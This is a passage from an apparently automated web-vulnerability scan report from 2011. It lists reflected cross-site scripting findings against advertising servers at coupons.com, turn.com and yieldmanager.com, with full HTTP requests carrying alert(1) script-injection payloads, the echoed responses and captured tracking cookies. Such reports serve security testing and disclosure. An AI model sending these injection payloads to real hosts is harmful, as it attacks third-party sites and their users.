Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:56 GMT
Content-Length: 7303
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30306502843_1320110936","http://ad.doubleclick.net/adj/q1.politico/home_run_of;net=q1;u=,q1-30306502843_1320110936,,none,;;sz=fb6ff'-alert(1)-'c85e9da208c;cmw=nurl;contx=none;dc=s;btg=?","fb6ff'-alert(1)-'c85e9da208c","",true);</scr'+'ipt>
...[SNIP]...

3.9. http://ad.coupons.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.coupons.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91333"-alert(1)-"e457910bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1204D645092189&c84521=xXVKRv2iYdqnFMisz5ihjZU32SOzJ&p84965=E10312011D1204D308539987&c84965=qY6fvauqC5k41BjGleLZTaYSfZo5k&p84947=E10312011D1204D472920716&c84947=T1E6OnhNTfysIAuMrDNG3DAQPnt1q&p84957=E10312011D1204D953106165&c84957=PCjL3EQdXEPQHTlrl63qQrrzSKIgb&91333"-alert(1)-"e457910bfe=1 HTTP/1.1
Host: ad.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://couponbar.coupons.com/adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 31 Oct 2011 19:04:23 GMT
Pragma: no-cache
Age: 99
Proxy-Connection: keep-alive
Content-Length: 4584

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.coupons.com/imp?91333"-alert(1)-"e457910bfe=1&Z=160x210&btcat=100&c84521=xXVKRv2iYdqnFMisz5ihjZU32SOzJ&c84947=T1E6OnhNTfysIAuMrDNG3DAQPnt1q&c84957=PCjL3EQdXEPQHTlrl63qQrrzSKIgb&c84965=qY6fvauqC5k41BjGleLZTaYSfZo5k&e=29890&nid=10&noBT=0&npage=1&
...[SNIP]...

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b83c"><script>alert(1)</script>920bf81711c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=9b83c"><script>alert(1)</script>920bf81711c&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27180&s=27181
Cookie: optOut=1; uid=3827355846744503244; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C21%7C2%7C5%7C1001%7C1004%7C1010; rds=15267%7C15267%7C15267%7C15267%7C15279%7C15267%7C15267%7C15267%7C15271%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15279%7C15267; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:31:39 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4585053464496052570&fpid=9b83c"><script>alert(1)</script>920bf81711c&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.11. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0264"><script>alert(1)</script>a3a5e653a48 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=d0264"><script>alert(1)</script>a3a5e653a48 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27180&s=27181
Cookie: optOut=1; uid=3827355846744503244; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C21%7C2%7C5%7C1001%7C1004%7C1010; rds=15267%7C15267%7C15267%7C15267%7C15279%7C15267%7C15267%7C15267%7C15271%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15279%7C15267; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:31:39 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4335739272196400654&fpid=1&nu=n&t=&sp=d0264"><script>alert(1)</script>a3a5e653a48&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.12. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1418"-alert(1)-"a3622220cf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=ad&ad_size=300x250&section=1921728&referrer=http://www.politico.com/index.html&b1418"-alert(1)-"a3622220cf1=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html
Cookie: ih="b!!!!+!1$ft!!!!#=7M8i!1ydy!!!!#=:TF[!1ye!!!!!$=7M8j!5-/I!!!!#=9<6Z!5S@-!!!!#=<R-C!5[nR!!!!$=<U@n!5dc*!!!!#=<UH=!5nq3!!!!#=<R-C"; pv1="b!!!!$!!`4w!-'l'!%jGW!5-/I!#*?N!!!!$!?5%!'2po7![`s1!(_W_!#RhI~~~~~~=9<6Z=>Nxe~!$@jb!$t!$!%)QJ!5dc*!'UTO!!mT-!?5%!*)6L<!wVd.!($B#!(?H/!)!=0~~~~~=<UH==<nA7!!!#G"; bh="b!!!$g!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+Wm!!!!#=<R-@!!+^.!!!!#=3Elr!!-?2!!!!.=5?_.!!-C,!!!!x=9?cE!!..X!!!!'=<R/0!!.s`!!!!#=8m]R!!0O4!!!!#=5@gl!!0O<!!!!$=5@gl!!1CB!!!!#=3_$E!!1SP!!!!#=38n,!!3O?!!!!x=9?cE!!<Os!!!!#=5@fB!!?VS!!DPb=5@bg!!Oun!!!!#=8-PI!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!.=5?_.!!`4u!!!!'=8-O`!!itb!!!!(=5@gl!!nAq!!!!#=3Elr!!pf4!!!!x=9?cE!!srh!!!!$=3i%'!!ssA!!!!#=5@gl!!t^G!!!!$=4'_`!!u*$!!!!)=4Qg^!!ucq!!!!$=5@gl!!vRm!!!!%=5@gl!!vRn!!!!$=5@gl!!vRq!!!!'=5@gl!!vRr!!!!'=5@gl!!vRv!!!!$=5@gl!!vRw!!!!)=5@gl!!vRx!!!!'=5@gl!!vRy!!!!'=5@gl!!y!r!!!!$=5@gl!!y!v!!!!$=5@gl!#!,g!!!!)=5@gl!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#,#=!!!!$=<R1i!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!%=5@gl!#0fW!!!!%=5@gl!#2A_!!!!%=5@gl!#2Ac!!!!#=5@gl!#2Ad!!!!$=5@gl!#2Gj!!!!x=9?cE!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!$=5@gl!#2g8!!!!#=8mW=!#3,2!!!!#=3eKS!#44f!!!!'=5@gl!#44h!!!!'=5@gl!#7(x!!!!(=5?_.!#7)a!!!!'=5?_.!#7.%!!!!#=5@gl!#7.'!!!!#=5@gl!#:@G!!!!%=3fAI!#<,#!!!!#=8mW=!#<v4!!!!$=5@af!#?dj!!!!$=3i%,!#?dk!!!!$=3i%,!#?gj!!!!#=4Qfv!#C,X!!!!#=3Elr!#CBJ!!!!#=5@gl!#CB[!!!!#=5@gl!#CB`!!!!#=5@gl!#CBd!!!!#=5@gl!#Dri!!!!#=3i%C!#H2.!!!!#=<R0x!#H2/!!!!$=<R1=!#H21!!!!$=<R1=!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!'=5@gl!#MTH!!!!'=5@gl!#MTI!!!!'=5@gl!#MTJ!!!!'=5@gl!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#O9C!!!!#=3i%,!#O9g!!!!#=3i%,!#Oay!!!!#=8m]R!#Ob!!!!!#=8m]R!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#Q^m!!!!#=:Gd(!#Sw^!!!!#=/(P2!#TnE!!!!$=5@gl!#U5q!!!!#=09!!!#UDP!!!!'=5@gl!#XF5!!!!#=8mW>!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#YmN!!!!#=4Kqg!#Ymj!!!!#=4Kqg!#Ymr!!!!#=4Kqg!#Ymw!!!!#=4Kqg!#Z8E!!!!+=5?_.!#Zgs!!!!'=5?_.!#ZhT!!!!(=5?_.!#[R[!!!!'=5@gl!#],3!!!!#=5@gl!#],7!!!!#=5@gl!#],9!!!!#=5@gl!#],:!!!!#=5@gl!#],?!!!!#=5@gl!#],@!!!!#=5@gl!#],A!!!!#=5@gl!#]9R!!!!$=9p55!#]BL!!!!#=5@gl!#]BM!!!!#=5@gl!#^#?!!!!$=8v.a!#`cQ!!!!#=5urU!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#agx!!!!#=5@gl!#ah!!!!!#=5@gl!#ah.!!!!#=5@gl!#ai7!!!!#=5@gl!#ai9!!!!#=5@gl!#ai?!!!!#=5@gl!#ai@!!!!#=5@gl!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!+=5?_.!#cA.!!!!#=5@af!#cB!!!!!$=5@af!#cB(!!!!$=5@af!#cmF!!!!$=5@af!#cmJ!!!!#=5@af!#cmM!!!!$=5@af!#dCX!!!!%=3Stu!#fBj!!!!+=5?_.!#fBk!!!!+=5?_.!#fBm!!!!+=5?_.!#fBn!!!!+=5?_.!#fG+!!!!'=5?_.!#fvy!!!!)=5@go!#g<y!!!!'=5?_.!#j9y!!!!$=6O^b!#nb^!!!!#=3M3D!#rj7!!!!#=5@af!#s`9!!!!#=5@af!#s`D!!!!#=5@af!#sa7!!!!#=5@af!#sak!!!!#=5@af!#sar!!!!#=5@af!#sg@!!!!#=5@af!#sgE!!!!#=5@af!#sxJ!!!!#=4Qfv!#t>.!!!!#=1,!r!#tLr!!!!$=5@af!#tLy!!!!#=5@gl!#tM)!!!!$=5@gl!#tn2!!!!'=5@gl!#trp!!!!.=5?_.!#uQD!!!!#=3_$E!#uQG!!!!#=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!'=5@gl!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#v<@!!!!#=5@gl!#wW9!!!!$=2Z2#!#xUN!!!!'=5@gl!#yM#!!!!$=2Z2#!$#4B!!!!%=5?_.!$#R7!!!!$=5@gl!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!%=3uq>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!.=5?_.!$(!P!!!!+=5?_.!$(Gt!!!!$=5@gl!$)gA!!!!#=09!!!$*9h!!!!#=5@fB!$*NG!!!!#=3_$G!$*ZH!!!!#=43u.!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$,jx!!!!#=5@fB!$-%:!!!!%=5?_.!$-(b!!!!$=5@gl!$-(d!!!!#=5@gl!$-k]!!!!#=5@fB!$.#F!!!!#=3i%Z!$.`:!!!!==4(vN!$0Ge!!!!$=3M3H!$0VL!!!!'=5?_.!$0VM!!!!'=5?_.!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!+=5?_.!$3y-!!!!.=:R+[!$4k,!!!!$=6O^`!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$5u,!!!!#=5@fB!$8+W!!!!'=5?_.!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!+=5?_.!$=X=!!!!#=3H<6!$=s9!!!!#=3+WO!$?=*!!!!#=3Elr!$?i5!!!!i=9?cE!$?i6!!!!#=91$E!$?tC!!!!$=5?_.!$@j^!!!!1=92#K!$AKn!!!!#=5@fB!$AMm!!!!#=5@fB!$Ak+!!!!#=5@go!$Ak3!!!!#=5@go!$Dg<!!!!#=<.XZ!$Kax!!!!#=<UH="; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; uid=uid=4763812e-ed0d-11e0-abd5-78e7d1fa053c&_hmacv=1&_salt=2264920275&_keyid=k1&_hmac=8e3f3df4cbccd1484e1eaa0c1eeeb601e12b81ba; vuday1=J+w=(!2VoW-O!O9; liday1=p[v32!2VoW:4Ggd

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:42:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 01 Nov 2011 01:42:25 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4266

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&anmember=541&anprice=&b1418"-alert(1)-"a3622220cf1=1&referrer=http%3a%2f%2fwww.politico.com%2findex.html&s=1921728&_salt=3327376166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Ar
...[SNIP]...

3.13. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6607a"><script>alert(1)</script>fedfa55f3ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2300359&6607a"><script>alert(1)</script>fedfa55f3ca=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25
Cookie: ih="b!!!!.!+5:c!!!!#=<UHD!1$ft!!!!#=7M8i!1ydy!!!!#=:TF[!1ye!!!!!$=7M8j!5-/I!!!!#=9<6Z!5S@-!!!!#=<R-C!5[lP!!!!#=<UW/!5[nR!!!!$=<U@n!5dc*!!!!#=<UH=!5dc+!!!!$=<UZx!5nq3!!!!#=<R-C"; pv1="b!!!!$!!`4w!-'l'!%jGW!5-/I!#*?N!!!!$!?5%!'2po7![`s1!(_W_!#RhI~~~~~~=9<6Z=>Nxe~!$@jb!$t!$!%)QJ!5dc+!'UTU!$S`<!!dN**ERU>!w1K*!($B#!!j:k!)!=:~~~~~=<UZx=<nSs!!!#G"; bh="b!!!$g!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+Wm!!!!#=<R-@!!+^.!!!!#=3Elr!!-?2!!!!.=5?_.!!-C,!!!!x=9?cE!!..X!!!!'=<R/0!!.s`!!!!#=8m]R!!0O4!!!!#=5@gl!!0O<!!!!$=5@gl!!1CB!!!!#=3_$E!!1SP!!!!#=38n,!!3O?!!!!x=9?cE!!<Os!!!!#=5@fB!!?VS!!DPb=5@bg!!Oun!!!!#=8-PI!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!.=5?_.!!`4u!!!!'=8-O`!!itb!!!!(=5@gl!!nAq!!!!#=3Elr!!pf4!!!!x=9?cE!!srh!!!!$=3i%'!!ssA!!!!#=5@gl!!t^G!!!!$=4'_`!!u*$!!!!)=4Qg^!!ucq!!!!$=5@gl!!vRm!!!!%=5@gl!!vRn!!!!$=5@gl!!vRq!!!!'=5@gl!!vRr!!!!'=5@gl!!vRv!!!!$=5@gl!!vRw!!!!)=5@gl!!vRx!!!!'=5@gl!!vRy!!!!'=5@gl!!y!r!!!!$=5@gl!!y!v!!!!$=5@gl!#!,g!!!!)=5@gl!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#,#=!!!!$=<R1i!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!%=5@gl!#0fW!!!!%=5@gl!#2A_!!!!%=5@gl!#2Ac!!!!#=5@gl!#2Ad!!!!$=5@gl!#2Gj!!!!x=9?cE!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!$=5@gl!#2g8!!!!#=8mW=!#3,2!!!!#=3eKS!#44f!!!!'=5@gl!#44h!!!!'=5@gl!#7(x!!!!(=5?_.!#7)a!!!!'=5?_.!#7.%!!!!#=5@gl!#7.'!!!!#=5@gl!#:@G!!!!%=3fAI!#<,#!!!!#=8mW=!#<v4!!!!$=5@af!#?dj!!!!$=3i%,!#?dk!!!!$=3i%,!#?gj!!!!#=4Qfv!#C,X!!!!#=3Elr!#CBJ!!!!#=5@gl!#CB[!!!!#=5@gl!#CB`!!!!#=5@gl!#CBd!!!!#=5@gl!#Dri!!!!#=3i%C!#H2.!!!!#=<R0x!#H2/!!!!$=<R1=!#H21!!!!$=<R1=!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!'=5@gl!#MTH!!!!'=5@gl!#MTI!!!!'=5@gl!#MTJ!!!!'=5@gl!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#O9C!!!!#=3i%,!#O9g!!!!#=3i%,!#Oay!!!!#=8m]R!#Ob!!!!!#=8m]R!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#Q^m!!!!#=:Gd(!#Sw^!!!!#=/(P2!#TnE!!!!$=5@gl!#U5q!!!!#=09!!!#UDP!!!!'=5@gl!#XF5!!!!#=8mW>!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#YmN!!!!#=4Kqg!#Ymj!!!!#=4Kqg!#Ymr!!!!#=4Kqg!#Ymw!!!!#=4Kqg!#Z8E!!!!+=5?_.!#Zgs!!!!'=5?_.!#ZhT!!!!(=5?_.!#[R[!!!!'=5@gl!#],3!!!!#=5@gl!#],7!!!!#=5@gl!#],9!!!!#=5@gl!#],:!!!!#=5@gl!#],?!!!!#=5@gl!#],@!!!!#=5@gl!#],A!!!!#=5@gl!#]9R!!!!$=9p55!#]BL!!!!#=5@gl!#]BM!!!!#=5@gl!#^#?!!!!$=8v.a!#`cQ!!!!#=5urU!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#agx!!!!#=5@gl!#ah!!!!!#=5@gl!#ah.!!!!#=5@gl!#ai7!!!!#=5@gl!#ai9!!!!#=5@gl!#ai?!!!!#=5@gl!#ai@!!!!#=5@gl!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!+=5?_.!#cA.!!!!#=5@af!#cB!!!!!$=5@af!#cB(!!!!$=5@af!#cmF!!!!$=5@af!#cmJ!!!!#=5@af!#cmM!!!!$=5@af!#dCX!!!!%=3Stu!#fBj!!!!+=5?_.!#fBk!!!!+=5?_.!#fBm!!!!+=5?_.!#fBn!!!!+=5?_.!#fG+!!!!'=5?_.!#fvy!!!!)=5@go!#g<y!!!!'=5?_.!#j9y!!!!$=6O^b!#nb^!!!!#=3M3D!#rj7!!!!#=5@af!#s`9!!!!#=5@af!#s`D!!!!#=5@af!#sa7!!!!#=5@af!#sak!!!!#=5@af!#sar!!!!#=5@af!#sg@!!!!#=5@af!#sgE!!!!#=5@af!#sxJ!!!!#=4Qfv!#t>.!!!!#=1,!r!#tLr!!!!$=5@af!#tLy!!!!#=5@gl!#tM)!!!!$=5@gl!#tn2!!!!'=5@gl!#trp!!!!.=5?_.!#uQD!!!!#=3_$E!#uQG!!!!#=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!'=5@gl!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#v<@!!!!#=5@gl!#wW9!!!!$=2Z2#!#xUN!!!!'=5@gl!#yM#!!!!$=2Z2#!$#4B!!!!%=5?_.!$#R7!!!!$=5@gl!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!%=3uq>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!.=5?_.!$(!P!!!!+=5?_.!$(Gt!!!!$=5@gl!$)gA!!!!#=09!!!$*9h!!!!#=5@fB!$*NG!!!!#=3_$G!$*ZH!!!!#=43u.!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$,jx!!!!#=5@fB!$-%:!!!!%=5?_.!$-(b!!!!$=5@gl!$-(d!!!!#=5@gl!$-k]!!!!#=5@fB!$.#F!!!!#=3i%Z!$.`:!!!!==4(vN!$0Ge!!!!$=3M3H!$0VL!!!!'=5?_.!$0VM!!!!'=5?_.!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!+=5?_.!$3y-!!!!.=:R+[!$4k,!!!!$=6O^`!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$5u,!!!!#=5@fB!$8+W!!!!'=5?_.!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!+=5?_.!$=X=!!!!#=3H<6!$=s9!!!!#=3+WO!$?=*!!!!#=3Elr!$?i5!!!!i=9?cE!$?i6!!!!#=91$E!$?tC!!!!$=5?_.!$@j^!!!!1=92#K!$AKn!!!!#=5@fB!$AMm!!!!#=5@fB!$Ak+!!!!#=5@go!$Ak3!!!!#=5@go!$Dg<!!!!#=<.XZ!$Kax!!!!%=<UZx"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; uid=uid=4763812e-ed0d-11e0-abd5-78e7d1fa053c&_hmacv=1&_salt=2264920275&_keyid=k1&_hmac=8e3f3df4cbccd1484e1eaa0c1eeeb601e12b81ba; vuday1=J+w=-!2VoW(:oZs; liday1=p[v32so/8=mIf.'!2VoWA`=f$

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:13:58 GMT
Server: YTS/1.19.8
